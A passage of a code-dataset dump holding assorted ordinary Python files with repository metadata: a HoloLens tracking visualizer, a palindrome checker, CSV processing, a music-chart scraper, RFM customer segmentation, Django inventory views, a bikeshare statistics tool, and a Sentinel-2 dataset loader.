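    fpr_i, tpr_i, _ = roc_curve(y_onehot[:, i], scores[:, i])
    mean_tpr += np.interp(fpr_grid, fpr_i, tpr_i)  # resample onto the shared grid
mean_tpr /= 3
print("macro-average AUC:", auc(fpr_grid, mean_tpr))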
eye_hit_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n right_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n left_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n marker_size = 500\r\n axs[i, j].scatter(eye_hit_pos_ndc[0],\r\n eye_hit_pos_ndc[1],\r\n color='ghostwhite',\r\n s=marker_size,\r\n label=eye_hit_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(right_index_tip_pos_ndc[0],\r\n right_index_tip_pos_ndc[1],\r\n color='orangered',\r\n marker='x',\r\n s=marker_size,\r\n label=right_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(left_index_tip_pos_ndc[0],\r\n left_index_tip_pos_ndc[1],\r\n color='g',\r\n marker='x',\r\n s=marker_size,\r\n label=left_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].set_xlabel('x-coord')\r\n axs[i, j].set_ylabel('y-coord')\r\n axs[i, j].legend(loc='lower left', fontsize='xx-large')\r\n\r\n fig.tight_layout()\r\n\r\n if (img_count == 0):\r\n continue\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention\r\n\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n plt.savefig(path + \"/\" + f\"instance_segmentation_masks_t_{saved_fig}.png\")\r\n saved_fig += 1\r\n\r\n plt.clf()\r\n plt.cla()\r\n plt.close(fig)\r\n","repo_name":"Kataglyphis/Designing-User-adaptive-Content-for-Mixed-Reality-Using-Eye-and-Hand-Tracking","sub_path":"UserGuidanceAI/visualization/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30899051666","text":"# Program created by Brayan Vera. 
Date 07/12/21\n\n# Program name: Palindrome_Num_Identifier\n# -This program makes sure to accept only palindrome numbers.\n# -This means the number is the same as its reverse.\n# -This program returns True if a palindrome number is entered,\n# returns False otherwise.\n# -This program does not accept negative numbers.\n# -This program does not accept strings.\n# Example:\n# 121 is good = True\n# 12321 is good = True\n# 122221 is good = True\n# 1211121 is good = True\n# 2222 is good = True\n# 1221 is good = True\n# -121 not valid = False\n\n# Found another technique:\n# -This program does not follow this technique, but we can also check the last digit and first digit,\n# incrementing and decrementing the indexes until we reach the middle and stop the program.\n\n# The way this program operates is by storing the input in a list that separates each digit.\n# Then another list in reverse is created and in the end is compared to see if it is a palindrome.\ndef palindrome_check(x):\n # Makes sure not to accept strings.\n if isinstance(x,str) == True:\n print(\"Invalid input, only numbers please, no string.\")\n return False\n # Makes sure it does not accept negative numbers.\n if x < 0:\n print(\"Not valid, only positive numbers please.\")\n return False\n\n # Converts the number to a string.\n int_to_str = str(x)\n # To split each number value individually and place them into a list.\n n = 1\n split_string = [int_to_str[index: index + n] for index in range(0, len(int_to_str), n)]\n #print(\"The first string: {}\".format(split_string))\n\n # Creating a new list to store the given list before it disappears when popping.\n store_old_str = []\n for store_old in split_string:\n store_old_str.append(store_old)\n\n new_list = []\n # Used to pop the last value of the old list and store it into a new list.\n while len(split_string) != 0:\n last_val_pop = split_string.pop()\n new_list.append(last_val_pop)\n #print(\"The new list: {}\".format(new_list))\n\n #print(\"The old string is : {}\".format(store_old_str))\n #print(\"The new reversed string is : {}\".format(new_list))\n\n if store_old_str == new_list:\n print(\"Is a palindrome.\")\n return True\n else:\n print(\"Is not a palindrome.\")\n return False\n\ndef main():\n x = 155545 #Enter number here. 
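The "Found another technique" note above describes, without implementing it, the two-pointer variant: compare the first and last digits and move both indexes inward until they meet. A compact sketch of that variant with the same validation rules (an illustration, not part of the original program):

def palindrome_check_two_pointer(x):
    # Reject strings and negative numbers, mirroring the checks above.
    if isinstance(x, str) or x < 0:
        return False
    digits = str(x)
    left, right = 0, len(digits) - 1
    while left < right:              # stop once the indexes meet in the middle
        if digits[left] != digits[right]:
            return False
        left += 1
        right -= 1
    return True

print(palindrome_check_two_pointer(12321))   # True
print(palindrome_check_two_pointer(155545))  # False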
\n palindrome_check(x)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"blvera/Brayan-Vera-Projects","sub_path":"My LeetCode - Python solved problems/Palindrome_Num_Identifier.py","file_name":"Palindrome_Num_Identifier.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17700881463","text":"import csv\n\n# open up numbers.csv\ncsv_file = open(\"numbers.csv\", \"r\")\ncsv_reader = csv.reader(csv_file)\n\n# open up reverse.csv\ncsv_new = open('reverse.csv', 'w')\ncsv_writer = csv.writer(csv_new)\n\n# take reversed csv_reader and dump into csv_writer\nfor row in csv_reader:\n row.reverse()\n csv_writer.writerow(row)\n\n# close both files, need to reopen csv_new as a read file\ncsv_file.close()\ncsv_new.close()\n\nwith open('reverse.csv', 'r') as reverseRows:\n for row in list(csv.reader(reverseRows)):\n # reset sum for each row\n sum = 0\n # for loop for each data point (30 columns) making sum for each row\n for i in range(30):\n sum += int(row[i])\n # average equation for each row\n average = float(sum / 30)\n # print that average, formatted to 2 decimal points\n print(\"The average for this row is: {:0.2f}\".format(average))\n\n\n","repo_name":"drewgillis9/Gillis_LMSC_261_ProblemSets","sub_path":"ProblemSet10/ProblemSet10.2.py","file_name":"ProblemSet10.2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27366390338","text":"import datetime\nimport json\n\nfrom common.automator_client import client\nfrom common.repos import ALL_REPOS\n\n\ndef get_items(org, repo, item_type):\n query_params = {\n \"org\": org,\n \"repo\": repo,\n \"item_type\": item_type,\n \"states[]\": ['CLOSED'],\n \"limit[]\": ['first', '100']\n }\n response = client.github.items.get(query_params=query_params)\n return json.loads(response.body)\n\n\ntotal_closed_prs = 0\nfor org in ALL_REPOS:\n for repo in ALL_REPOS[org]:\n items = get_items(org, repo, 'pull_requests')\n for item in items:\n closed_at = datetime.datetime.strptime(item['closedAt'], '%Y-%m-%dT%H:%M:%SZ')\n text = \"{}, {} , {}, {}, {}\".format(repo, item['url'], item['points'],\n item['reviewer_points'], closed_at.date())\n print(text)\n total_closed_prs = total_closed_prs + 1\n\nprint(\"There were a total of {} closed prs across all repos\".format(total_closed_prs))\n","repo_name":"sendgrid/dx-automator","sub_path":"examples/closed_prs.py","file_name":"closed_prs.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"38"} +{"seq_id":"71757895472","text":"from bs4 import BeautifulSoup\nimport csv\nimport requests\nfrom pprint import pprint\n\nmelon_url = 'https://www.melon.com/chart/index.htm'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'\n}\n\nresponse = requests.get(melon_url, headers=headers).text\n# pprint(response)\n\ndata = BeautifulSoup(response, 'html.parser')\n# print(data)\n\nsongs = data.select('#lst50')\n# print(songs)\n\nresult_list = []\nfor song in songs:\n rank = song.select_one('td:nth-child(2) > div > span.rank').text\n name = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank01 > span > a').text\n # artist = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank02 > a').text\n # artists = 
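The averaging loop in the reverse.csv record above hard-codes 30 columns; a slightly more general sketch (same csv module, same hypothetical file) averages however many columns a row actually has:

import csv

with open('reverse.csv', 'r') as f:
    for row in csv.reader(f):
        values = [int(v) for v in row]       # one int per column, any width
        average = sum(values) / len(values)  # no fixed column count
        print("The average for this row is: {:0.2f}".format(average))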
song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > a')\n artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > span.checkEllipsis')\n # result_dict = {'rank': rank, 'name': name, 'artist': artist}\n # result_dict = {'rank': rank, 'name': name, 'artist': ','.join([artist.text for artist in artists])}\n result_dict = {'rank': rank, 'name': name, 'artist': [artist.text for artist in artists]}\n result_list.append(result_dict)\n# print(result_list)\n\nwith open('melon_rank_01.csv', 'w', encoding='utf-8', newline='') as csvfile:\n fieldnames = ('rank','name','artist')\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for item in result_list:\n writer.writerow(item)","repo_name":"athletejuan/TIL","sub_path":"Python/SS4th/StartCamp/Write_Read/csv/practice/melon_rank_01.py","file_name":"melon_rank_01.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"11472003479","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nimport warnings\r\nimport seaborn as sns\r\nimport plotly as py\r\nimport plotly.graph_objs as go\r\nimport plotly.offline as py\r\npy.offline.init_notebook_mode()\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_columns',None)\r\nfile_path = './data.csv'\r\ndf = pd.read_csv(file_path)\r\n#print(df.head())\r\n#print(df.info())\r\n#print(df[df['InvoiceNo'].str[0] == 'C'])\r\n\r\n\r\n#Data cleaning\r\nprint(df.apply(lambda x:sum(x.isnull())/len(x),axis=0))\r\ndf.drop(['Description'],axis=1,inplace=True)\r\n#print(df)\r\ndf['CustomerID'] = df['CustomerID'].fillna('U')\r\ndf['amount'] = df['Quantity']*df['UnitPrice']\r\n#print(df.info())\r\ndf['date']= [i.split(' ')[0] for i in df['InvoiceDate']]\r\n# df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\r\n# df['date'] = [i.strftime('%d-%m-%Y') for i in df['InvoiceDate']]\r\n\r\n# print(df.info())\r\n# print(df.head())\r\ndf['time'] = [i.split(' ')[1] for i in df['InvoiceDate']]\r\n#print(df[['time','date']])\r\ndf.drop(['InvoiceDate'],axis=1,inplace=True)\r\n#print(df['date'].head())\r\ndf['year'] = [i.split('/')[2] for i in df['date']]\r\ndf['month'] = [i.split('/')[0] for i in df['date']]\r\ndf['day'] = [i.split('/')[1] for i in df['date']]\r\n#print(df[['date','year','month','day']].head())\r\ndf['date'] = pd.to_datetime(df['date'])\r\ndf = df.drop_duplicates()\r\n# print(df.describe())\r\ndf2 = df.loc[df['UnitPrice']<=0]\r\n# print(df2.shape[0]/df.shape[0])\r\n# print(df2['UnitPrice'].groupby(by=df2['UnitPrice']).count())\r\n\r\n#Data analysis\r\ndf1 = df.loc[(df['Quantity']<=0)]\r\ntt = pd.pivot_table(df1, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(tt)\r\ndf2 = df[(df['Quantity']>0) & (df['UnitPrice']>0)]\r\npp = pd.pivot_table(df2, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(pp)\r\n# print(np.abs(tt/pp))\r\nnp.abs(tt/pp).loc['2011'].mean()\r\n\r\n#Plotting (resolved)\r\n\r\nR_value = df.groupby('CustomerID')['date'].max()\r\ndf2['date'].max()\r\nR_value = (df2['date'].max()-R_value).dt.days\r\nF_value = df2.groupby('CustomerID')['InvoiceNo'].nunique()\r\nM_value = df2.groupby('CustomerID')['amount'].sum()\r\nsns.set(style = 'darkgrid')\r\n# plt.hist(R_value)\r\n# plt.show()\r\nR_bins = [0,30,90,180,360,720]\r\nF_bins = [1,2,5,10,20,5000]\r\nM_bins = [0,55,2000,5000,10000,200000]\r\nR_score = pd.cut(R_value,R_bins,labels=[5,4,3,2,1],right=False)\r\n#print(R_score)\r\nF_score = pd.cut(F_value,F_bins,labels=[1,2,3,4,5],right=False)\r\nM_score = pd.cut(M_value,M_bins,labels=[1,2,3,4,5],right=False)\r\nrfm = pd.concat([R_score,F_score,M_score],axis=1)\r\n#print(F_score.shape,M_score.shape,R_score.shape)\r\n# print(rfm)\r\nrfm.rename(columns={'date':'R_score','InvoiceNo':'F_score','amount':'M_score'},inplace=True)\r\nfor i in ['R_score','F_score','M_score']:\r\n rfm[i] = rfm[i].astype(float)\r\nrfm['R'] = np.where(rfm['R_score']>3.82,'High','Low')\r\nrfm['F'] = np.where(rfm['F_score']>2.03,'High','Low')\r\nrfm['M'] = np.where(rfm['M_score']>1.8,'High','Low')\r\nrfm['value'] = rfm['R'].str[:] +rfm['F'].str[:] + rfm['M'].str[:]\r\n#print(rfm.info())\r\ndef trans_value(x):\r\n if x == 'HighHighHigh':\r\n return 'Key value customers'\r\n elif x=='HighLowHigh':\r\n return 'Key development customers'\r\n elif x== 'LowHighHigh':\r\n return 'Key retention customers'\r\n elif x== 'LowLowHigh':\r\n return 'Key win-back customers'\r\n elif x=='HighHighLow':\r\n return 'General value customers'\r\n elif x== 'HighLowLow':\r\n return 'General development customers'\r\n elif x=='LowHighLow':\r\n return 'General retention customers'\r\n else:\r\n return 'General win-back customers'\r\n\r\nrfm['user_level'] = rfm['value'].apply(trans_value)\r\nrfm['user_level'].value_counts()\r\ntrade_basic = [go.Bar(x = rfm['user_level'].value_counts().index, y=rfm['user_level'].value_counts().values,marker = dict(color='orange'),opacity=0.50)]\r\nlayout = go.Layout(title='User level overview',xaxis = dict(title='User importance'))\r\nfigure_basic = go.Figure(data= trade_basic,layout=layout)\r\npy.plot(figure_basic)\r\n# trace = [go.Pie(labels= rfm['user_level'].value_counts().index, values=rfm['user_level'].value_counts().values,textfont=dict(size=12,color='white'))]\r\n# layout2 = go.Layout(title='User level proportions')\r\n# figure_basic2 = go.Figure(data= trace,layout=layout2)\r\n# py.plot(figure_basic2)\r\n\r\n#Conclusions and recommendations\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"HarCP3/data-analysis","sub_path":"ecommerce.py","file_name":"ecommerce.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26621470227","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, generics, permissions, views, exceptions, response\n\nfrom . import models as inv_model\nfrom . 
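The RFM scoring above relies on pd.cut with right=False, i.e. bins closed on the left: a recency of exactly 30 days falls into [30, 90) and scores 4, not 5. A tiny check of that binning with toy values (pandas only; the values are made up):

import pandas as pd

R_bins = [0, 30, 90, 180, 360, 720]
r_values = pd.Series([5, 30, 89, 180, 719])
r_scores = pd.cut(r_values, R_bins, labels=[5, 4, 3, 2, 1], right=False)
print(r_scores.tolist())   # [5, 4, 4, 2, 1]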
import serializers as inv_serializer\n\nfrom account.models import UserMixIn\nfrom account.permissions import IsStoreManager\n\n\nclass InventoryView(viewsets.ModelViewSet):\n model = inv_model.Inventory\n queryset = model.objects.all()\n serializer_class = inv_serializer.InventorySerilizer\n\n def perform_create(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.CREATE\n serializer.save()\n\n def perform_update(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.UPDATE\n serializer.save()\n\n def perform_destroy(self, instance):\n # DRF passes the model instance here, not a serializer; flag the\n # record for deletion so a store manager can approve the change.\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n instance.status = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n instance.status = inv_model.Inventory.PENDING\n instance.action = inv_model.Inventory.DELETE\n instance.save()\n\n\nclass AccepetRejectInventory(views.APIView):\n \"\"\" accept or reject inventory\"\"\"\n permission_classes = (\n permissions.IsAuthenticated, IsStoreManager,\n )\n\n def post(self, request, *args, **kwargs):\n action_name = kwargs['action_type']\n try:\n inventory = inv_model.Inventory.objects.get(id=kwargs['id'])\n except inv_model.Inventory.DoesNotExist:\n raise exceptions.ParseError({'details':\"Invalid id\"})\n \n if action_name == \"accept\":\n update_data = inventory.update_data\n # update_data holds the pending field changes as a dict\n for key, value in update_data.items():\n setattr(inventory, key, value)\n inventory.status = inv_model.Inventory.ACCEPT\n inventory.save()\n else:\n inventory.status = inv_model.Inventory.PENDING\n inventory.save()\n return response.Response({'details': \"Inventory updated successfully.\"})\n","repo_name":"aman0511/coin-drive-test","sub_path":"inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4331740108","text":"import time\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nCITY_DATA = {'chicago': 'chicago.csv',\r\n 'new york city': 'new_york_city.csv',\r\n 'washington': 'washington.csv'}\r\n\r\n\r\ndef get_filters():\r\n \"\"\"\r\n Asks user to specify a city, month, and day to analyze.\r\n\r\n Returns:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n \"\"\"\r\n print('Hello! Let\\'s explore some US bikeshare data!')\r\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle\r\n while True:\r\n city = input(\"\\nEnter the name of city you need (chicago, new york city, washington):\").lower()\r\n if city in ['chicago', 'new york city', 'washington']:\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid city name\")\r\n\r\n # TO DO: get user input for month (all, january, february, ... 
, june)\r\n while True:\r\n month = input(\"\\n Enter which month you need ( january, february, march, april, may, june) Or (all) to all monthes :\").lower()\r\n if month in ('all', 'january', 'february', 'march', 'april', 'may', 'june'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid month name\")\r\n\r\n # get user input for day of week (all, monday, tuesday, ... sunday)\r\n while True:\r\n day = input(\"\\n Enter which day you need (monday, tuesday, wednesday, thursday, friday, saturday, sunday) Or (all) to all days :\").lower()\r\n if day in ('all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid day name\")\r\n\r\n print('-'*40)\r\n return city, month, day\r\n\r\n\r\ndef load_data(city, month, day):\r\n \"\"\"\r\n Loads data for the specified city and filters by month and day if applicable.\r\n\r\n Args:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n Returns:\r\n df - Pandas DataFrame containing city data filtered by month and day\r\n \"\"\"\r\n# i used it from project 3\r\n# load data file into a dataframe\r\n df = pd.read_csv(CITY_DATA[city])\r\n\r\n # convert the Start Time column to datetime\r\n df['Start Time'] = pd.to_datetime(df['Start Time'])\r\n\r\n # extract month , day and hour of week from Start Time to create new columns\r\n df['month'] = df['Start Time'].dt.month\r\n df['day_of_week'] = df['Start Time'].dt.weekday_name\r\n df['start hour'] = df['Start Time'].dt.hour\r\n\r\n # filter by month if applicable\r\n if month != 'all':\r\n # use the index of the months list to get the corresponding int\r\n months = ['january', 'february', 'march', 'april', 'may', 'june']\r\n month = months.index(month) + 1\r\n\r\n # filter by month to create the new dataframe\r\n df = df[df['month'] == month]\r\n\r\n # filter by day of week if applicable\r\n if day != 'all':\r\n # filter by day of week to create the new dataframe\r\n df = df[df['day_of_week'] == day.title()]\r\n\r\n return df\r\n\r\n\r\ndef time_stats(df):\r\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\r\n\r\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display the most common month\r\n print(\" \\nMost common month is:\", df['month'].mode()[0])\r\n\r\n # TO DO: display the most common day of week\r\n print(\" \\nMost common day is:\", df['day_of_week'].mode()[0])\r\n\r\n # TO DO: display the most common start hour\r\n print(\" \\nMost common start hour is:\", df['start hour'].mode()[0])\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef station_stats(df):\r\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\r\n\r\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\r\n start_time = time.time()\r\n # TO DO: display most commonly used start station\r\n print(\"\\n Most commonly used start station is:\",df['Start Station'].mode()[0])\r\n\r\n # TO DO: display most commonly used end station\r\n print(\"\\n Most commonly used end station is:\", df['End Station'].mode()[0])\r\n\r\n # TO DO: display most frequent combination of start station and end station trip\r\n df['start_to_end'] = df['Start Station']+' ' + df['End Station']\r\n most_start_toend = 
df['start_to_end'].mode()[0]\r\n print(\"\\n Most frequent combination of start station and end station trip:\", most_start_toend)\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef trip_duration_stats(df):\r\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\r\n\r\n print('\\nCalculating Trip Duration...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display total travel time\r\n print(\"\\n Total travel time:\", df['Trip Duration'].sum())\r\n\r\n # TO DO: display mean travel time\r\n print(\"\\n Mean travel time:\", df['Trip Duration'].mean())\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef user_stats(df):\r\n \"\"\"Displays statistics on bikeshare users.\"\"\"\r\n\r\n print('\\nCalculating User Stats...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: Display counts of user types\r\n try:\r\n print(\"\\n Gender\", df['Gender'].value_counts())\r\n except:\r\n print(\"\\n Ops,there is no data about gender in this city\")\r\n\r\n # TO DO: Display earliest, most recent, and most common year of birth\r\n try:\r\n print(\"\\nEarliest common year of birth\", int(df['Birth Year'].min()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost recent common year of birth\",int(df['Birth Year'].max()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost common common year of birth\",int(df['Birth Year'].mode()[0]))\r\n except:\r\n print(\"\\n Ops, there is no data about year of birth in this city\")\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef display_rows(df):\r\n # ask user to display 5 rowes of data\r\n x = 0\r\n while True:\r\n ask = input(\"Are you need to display next 5 rows of data?\\n choice(yes or no):\").lower()\r\n if ask != 'yes' and ask != 'no':\r\n print(\"\\n Ops ,wrong choice,pleas choice (yes or not)\")\r\n elif ask == 'no':\r\n break\r\n else:\r\n if x+5 < df.shape[0]:\r\n print(df.iloc[x:x+5])\r\n x += 5\r\n\r\n\r\ndef main():\r\n while True:\r\n city, month, day = get_filters()\r\n df = load_data(city, month, day)\r\n\r\n time_stats(df)\r\n station_stats(df)\r\n trip_duration_stats(df)\r\n user_stats(df)\r\n display_rows(df)\r\n\r\n restart = input('\\nWould you like to restart? 
Enter yes or no.\\n')\r\n if restart.lower() != 'yes':\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"AhmedAbdelhamed01/Bikeshare-Data","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3887481233","text":"metadata = \"\"\"\nsummary @ Digital distribution client bootstrap package\nhomepage @ http://steampowered.com/\nlicense @ custom\nsrc_url @ http://repo.steampowered.com/steam/pool/steam/s/steam/steam_1.0.0.50.tar.gz\narch @ ~x86_64\noptions @ nls static-libs threads\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir =\"%s\" %name\n\ndef prepare():\n patch(level=1)\n\n\ndef build():\n make()\n \n \ndef install():\n raw_install('DESTDIR=%s' % install_dir)\n # insdoc('AUTHORS', 'LICENSE', 'NEWS', 'README', 'THANKS')\n","repo_name":"wdysln/new","sub_path":"app-games/steam/steam-1.0.0.50.py","file_name":"steam-1.0.0.50.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34696255666","text":"from pony.orm import Required, Database, set_sql_debug\n\nfrom settings import DB_CONFIG\n\ndb = Database()\n# PostgreSQL\ndb.bind(**DB_CONFIG)\n\n\nclass UserTasks(db.Entity):\n user_id = Required(int)\n name = Required(str)\n date = Required(str)\n task = Required(str)\n\n\ndb.generate_mapping(create_tables=True)\nset_sql_debug(True)\n# UserTasks.get(user_id = 123321)\n","repo_name":"kallarias/tg_bot","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16269580977","text":"import torch\nimport rasterio as rio\nimport pandas as pd\nimport geopandas as gpd\nimport os\nfrom skimage.morphology import binary_opening\nimport numpy as np\nfrom rasterio import features\nfrom shapely.geometry import shape\nfrom shapely.geometry import Polygon\n\nfrom itertools import product\nimport numpy as np\nimport geopandas as gpd\nfrom torch.utils.data import Dataset\nfrom glob import glob\nfrom torchvision.transforms import Resize\nimport torchvision\nimport rasterio\nfrom torchvision.transforms.functional import resize\nimport numpy as np\nfrom scipy.stats import skewcauchy\nfrom tqdm import tqdm\nfrom copy import copy\n\nBANDS = [\"B01\", \"B02\", \"B03\", \"B04\", \"B05\", \"B06\", \"B07\", \"B08\", \"B8A\", \"B09\", \"B10\", \"B11\", \"B12\"]\n\ndef load_s2_image(imagepath, bounds, expected_image_size):\n left, bottom, right, top = bounds\n\n # extract bands and image sizes\n band_stack = []\n for band in BANDS:\n with rasterio.open(os.path.join(imagepath, band + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n band_stack.append(src.read(1, window=patch_window))\n\n # extract dimensions of the B02.jpg band (10m) to rescale other images to this size\n height, width = band_stack[1].shape\n\n size_in_px = expected_image_size // 10\n if height == size_in_px and width == size_in_px:\n\n # bilinearly interpolate all bands to 10m using torch functional resize\n band_stack = [\n resize(torch.from_numpy(b[None].astype(\"int32\")), [height, width]).squeeze(0).numpy() for b in band_stack\n ]\n\n # stack to image [13 x H x W]\n image = np.stack(band_stack)\n\n # valid pixels are where there is no 0 in all bands\n invalid_mask = image.sum(0) == 
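The Pony ORM record above only declares and maps the UserTasks entity; reads and writes have to happen inside a db_session. A hedged usage sketch (entity and binding exactly as defined above; the row values are made up):

from pony.orm import db_session, select

with db_session:
    # Insert a row; Pony flushes and commits when the session exits.
    UserTasks(user_id=123321, name="alice", date="2023-01-01", task="write report")

with db_session:
    tasks = select(t.task for t in UserTasks if t.user_id == 123321)[:]
    print(tasks)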
0\n\n if not np.isnan(image).any():\n\n if not invalid_mask.any():\n\n # prepare metadata for storing a georeferenced patch on disk\n\n # extract transform of the window from a 10m band\n with rasterio.open(os.path.join(imagepath, BANDS[1] + \".jp2\")) as src:\n patch_window = rasterio.windows.from_bounds(left, bottom, right, top, src.transform)\n win_transform = src.window_transform(patch_window)\n profile = src.profile\n profile[\"width\"], profile[\"height\"], profile[\"count\"] = width, height, len(BANDS)\n profile[\"transform\"] = win_transform\n\n return image, profile\n\n # if image not in correct size or contains invalid data\n return None, None\n\nclass SettlementDataset(Dataset):\n def __init__(self, data_path,\n tile,\n imagesize=640, # imagesize in meter\n segmentation=False,\n overwrite=False\n ):\n # prepare data (is skipped if already present)\n mosaik(data_path=data_path, tile=tile, overwrite=overwrite)\n write_urban_tif_and_shape(data_path, tile, overwrite=overwrite)\n\n # initialization\n self.index = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"urban\", f\"{tile}.shp\"), index_col=0)\n self.imagepath = os.path.join(data_path, \"Test\", tile, \"mosaik\")\n self.imagesize = imagesize\n self.segmentation = segmentation\n\n if segmentation:\n gdf = gpd.read_file(os.path.join(data_path, \"Test\", tile, \"labels\", \"vector\", f\"{tile}.shp\"))\n self.shapes = gdf.loc[gdf[\"a_name\"] == 